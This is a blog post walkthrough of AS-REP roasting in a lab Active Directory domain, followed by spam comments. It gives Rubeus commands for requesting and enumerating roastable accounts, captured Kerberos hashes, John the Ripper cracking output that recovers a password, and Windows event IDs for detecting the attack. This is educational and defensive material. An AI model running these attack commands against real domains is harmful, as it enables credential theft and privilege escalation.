Hi Guys,
We can read in many articles about kerberoasting SPN account in active directory which might give the adversaries an easy way to escalate them to the privileged user by requesting TGS for SPN account and cracking the response offline
I would like to discuss the second interesting similar technique like kerbroasting technique which request for an account and getting the response hash for offline cracking. Unlike kerberos where we need to issue is TGS and wait for the TGS response, but with this technique we will be cracking the TGT hash response which known as AS-REP Roasting.
Ticket Granting Ticket
Use of the TGT was designed into the Kerberos protocol to avoid frequently asking the user for a password, a password used by Kerberos to derive a master key or storing the master key on the workstation.
Ticket Granting Ticket” (TGT) is returned in the AS_REP packet. The TGT can then be used by the client to prove the user is who she says she is and is properly authenticated. This ticket is good for a configurable time period
Why Pre-authentication ?
By default the KDC requires all accounts to use pre-authentication. This is a security feature which offers protection against password-guessing attacks. The AS (Authentication Service) request identifies the client to the KDC in plain text. If pre-authentication is enabled, a time stamp will be encrypted using the user’s password hash as an encryption key. If the KDC reads a valid time when using the user’s password hash, which is available in the Active Directory, to decrypt the time stamp, the KDC knows that request isn’t a replay of a previous request.
When you do not enforce pre-authentication, a malicious attacker can directly send a dummy request for authentication. The KDC will return an encrypted TGT and the attacker can brute force it offline.
AS-REP Roasting
AS-REP Roasting is an attack against Kerberos for user accounts that do not require preauthentication. Pre-authentication is the first step in Kerberos authentication, and is designed to prevent brute-force password guessing attacks.
We can use the help of rubeus application to run the request
Rubeus.exe asreproast /user:AppService1 /domain:corp /dc:192.168.100.129
[*] Action: AS-REP roasting
[*] Target User : AppService1
[*] Target Domain : corp
[*] Target DC : 192.168.100.129
[*] Using domain controller: 192.168.100.129
[*] Building AS-REQ (w/o preauth) for: 'corp\AppService1'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$AppService1@corp:E5AA2C0539D013373417C2D122E98A02$3B70D7887B633196642
A8CB734C2D8972EE5C95887ACA40E5CBC0F4805D7********69F0AE1C1D6882650F32CB0A011
C776CE605EF322E16CB7A5E686DE49******855642A8E0E6A43282D939C7AE027061EEF3EC2555
812CF35F3DA96AE705BBB7ABAAAE81DD4A453DECD792D59EB5BC246C58995C79B64122DBEE5F536B
68E0C365BBFD6979950E62FA80712B5A9FB*********563834D2C36E5A73C5C088014863956
726BC4B52D177F733203682DE7DD78BE055451EECF2D74D28E3F2E96EDD868EB84CD66019203E20E
E74CDCE9D9B59CA2C5A8B229A29BA049B
Wireshark traffic REQ. Based on the above command which basically Rubeus send REQ traffic to the KDC along with the account name
Wireshark traffic for RES, As the response from the KDC as below
The ticket hash will be in the enc-part. We can compar the value as below
The request above will be logged in security event in the Active Directory with event ID = 4768
A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: AppService1
Supplied Realm Name: corp
User ID: CORP\AppService1
Service Information:
Service Name: krbtgt
Service ID: CORP\krbtgt
Network Information:
Client Address: ::ffff:192.168.100.128
Client Port: 50154
Additional Information:
Ticket Options: 0x40800010
Result Code: 0x0
Ticket Encryption Type: 0x17
Pre-Authentication Type: 0
Certificate Information:
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
The above query is successful eventhough I queried the TGT from non authenticated windows user. This is because the account that I queried is set to “Do not require Kerberos preauthentication”
If we change the configuration to become require kerberos preauthentication and run again the rubeus application will result like this below with error KDC_ERR_PREAUTH_REQUIRED
C:\Temp\Ghostpack-CompiledBinaries-master>Rubeus.exe asreproast /user:AppService1 /domain:corp /dc:192.168.100.129
[*] Action: AS-REP roasting
[*] Target User : AppService1
[*] Target Domain : corp
[*] Target DC : 192.168.100.129
[*] Using domain controller: 192.168.100.129
[*] Building AS-REQ (w/o preauth) for: 'corp\AppService1'
[X] KRB-ERROR (25) : KDC_ERR_PREAUTH_REQUIRED
We can see from the in the kerberos traffic that as below there is an error mentioned KRB5KDC_ERR_PREAUTH_REQUIRED. What happened here because the server is now expecting the REQ contain timestamp that is encrypted with the user password but it is found that the request only contain the timestamp without being encrypted. So the the server return the error message
We cannot get the TGT result without active directory authenticated user. But luckily this configuration “Do not require Kerberos preauthentication” is disabled for all account so that it will not be that easy to request TGT for an account unless the administrator manually set it up
Cracking the hash
So after you get the hash, You can crack the password by using Hashcat or John. I use john for this testing
root@net-dragon:~/box/rioAD# john toCrack.txt --wordlist=passList
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 4 candidates left, minimum 32 needed for performance.
Paasw0RD123 ($krb5asrep$AppService1@corp)
1g 0:00:00:00 DONE (2020-07-03 10:39) 100.0g/s 400.0p/s 400.0c/s 400.0C/s rio..Paasw0RD123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@net-dragon:~/box/rioAD#
How to find the account
We can use rubeus application to find the account with “Do not require Kerberos preauthentication” in order to make your life easier. here is the command
C:\Temp\Ghostpack-CompiledBinaries-master>Rubeus.exe asreproast /creduser:corp.local\netman /credpassword:PasPas! /domain:corp /dc:192.168.100.129
[*] Action: AS-REP roasting
[*] Target Domain : corp
[*] Target DC : 192.168.100.129
[*] Using alternate creds : corp.local\administrator
[*] Searching path 'LDAP://corp.local' for AS-REP roastable users
[*] SamAccountName : AppService1
[*] DistinguishedName : CN=AppService1,OU=Service Account,OU=North America,OU=Americas,OU=Global,DC=corp,DC=local
[*] Using domain controller: 192.168.100.129
[*] Building AS-REQ (w/o preauth) for: 'corp\AppService1'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$AppService1@corp:6C525FFD85785134CBDFFA2B94EB46EC$64F98252612F2F81099
15C858D86A721E73EE48F1A7BFFFF4B9390AC5AB2CD6DEE**********E696F0268683DC1DAD64050
EF1A172C682AFAAD519EED027A38E650402A5234646424A9AFD8DD7E91F9B1B498FAD127C2A73CA4
2BD09840C6A5615B02C657EE6F086B0277**********B93B121E421EAC36F65FCFACD56439288BEC
BFE235B3533E08C62D423ADAFD50AB360F38F1041A67F979A8D87B5266860FCCC406ACEE34D1888B
0ADE93E41D1C8DFD1698CABBE2CBE84B2BB3E974C0BFBBDD92D3D09BE73F6C539B92517F3A74CCA0
1E0F7943D6E8D4CA6D7439EDCA6B0373D
The windows secrutiy event log generated pattern would be like below. So if you have a good SIEM which could detect the pattern of sequence of events then you can use below pattern to detect the account enumeration
- Credential Validation ID = 4776 verification of requester account : netman
The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: netman
Source Workstation: DESKTOP-C85128F
Error Code: 0x0
2. Logon ID = 4624, netman account login
An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: CORP\netman
Account Name: netman
Account Domain: CORP
Logon ID: 0x17C0D9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: DESKTOP-C85128F
Source Network Address: 192.168.100.128
Source Port: 49733
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): NTLM V2
Key Length: 128
3. Kerberos Authentication Server ID = 4768 TGT for netman created as part of netman account authentication process
A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: netman
Supplied Realm Name: corp.local
User ID: CORP\netman
Service Information:
Service Name: krbtgt
Service ID: CORP\krbtgt
Network Information:
Client Address: ::ffff:192.168.100.128
Client Port: 49736
Additional Information:
Ticket Options: 0x40810010
Result Code: 0x0
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2
Certificate Information:
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
4. Kerberos Ticket Operation ID = 4769 TGS for netman requested
A Kerberos service ticket was requested.
Account Information:
Account Name: netman@CORP.LOCAL
Account Domain: CORP.LOCAL
Logon GUID: {8be78462-4a24-e132-a39a-b601813d00d3}
Service Information:
Service Name: DC$
Service ID: CORP\DC$
Network Information:
Client Address: ::ffff:192.168.100.128
Client Port: 49737
Additional Information:
Ticket Options: 0x40800000
Ticket Encryption Type: 0x12
Failure Code: 0x0
Transited Services: -
5. Logon ID = 4624 for netman
An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: CORP\netman
Account Name: netman
Account Domain: CORP.LOCAL
Logon ID: 0x17C0F7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {8be78462-4a24-e132-a39a-b601813d00d3}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 192.168.100.128
Source Port: 49734
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
6. Kerberos Authentication Service ID = 4768 for AppService1
A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: AppService1
Supplied Realm Name: corp
User ID: CORP\AppService1
Service Information:
Service Name: krbtgt
Service ID: CORP\krbtgt
Network Information:
Client Address: ::ffff:192.168.100.128
Client Port: 49738
Additional Information:
Ticket Options: 0x40800010
Result Code: 0x0
Ticket Encryption Type: 0x17
Pre-Authentication Type: 0
Certificate Information:
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
7. Logof ID = 4634
8. Logof ID = 4634
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 
This is a great blog.
I love reading your site.
We are a gaggle of volunteers and opening a brand new scheme in our community. Your site offered us with valuable information to paintings on. You’ve done a formidable job and our whole group will be grateful to you.
I truly appreciate this post. I’ve been looking all over for this! Thank goodness I found it on Bing. You have made my day! Thx again
Simply wish to say your article is as amazing. The clarity in your post is simply cool and i can assume you’re an expert on this subject. Well with your permission let me to grab your RSS feed to keep updated with forthcoming post. Thanks a million and please carry on the rewarding work.
I’m often to blogging and i actually recognize your content. The article has really peaks my interest. I am going to bookmark your site and maintain checking for new information.
Generally I don’t read article on blogs, but I would like to say that this write-up very forced me to try and do so! Your writing style has been surprised me. Thanks, quite nice post.
Hi there, I found your blog via Google while searching for a related topic, your site came up, it looks great. I’ve bookmarked it in my google bookmarks.
I have to show some thanks to this writer just for bailing me out of this particular dilemma. Because of scouting through the the web and finding things which were not beneficial, I believed my life was done. Being alive devoid of the approaches to the problems you have sorted out by way of your blog post is a serious case, and ones that would have negatively damaged my career if I had not noticed your blog. Your primary understanding and kindness in maneuvering everything was crucial. I don’t know what I would’ve done if I had not come across such a stuff like this. I can also at this moment look forward to my future. Thanks for your time very much for your skilled and amazing help. I will not think twice to recommend your web page to anyone who will need direction about this problem.
Greetings! Quick question that’s completely off topic. Do you know how to make your site mobile friendly? My weblog looks weird when viewing from my iphone 4. I’m trying to find a template or plugin that might be able to correct this problem. If you have any suggestions, please share. Thanks!
Wow, amazing weblog format! How lengthy have you ever been running a blog for? you made running a blog glance easy. The whole look of your web site is great, let alone the content material!
Hiya, I am really glad I’ve found this info. Nowadays bloggers publish only about gossips and internet and this is actually frustrating. A good web site with interesting content, this is what I need. Thanks for keeping this web-site, I will be visiting it. Do you do newsletters? Can’t find it.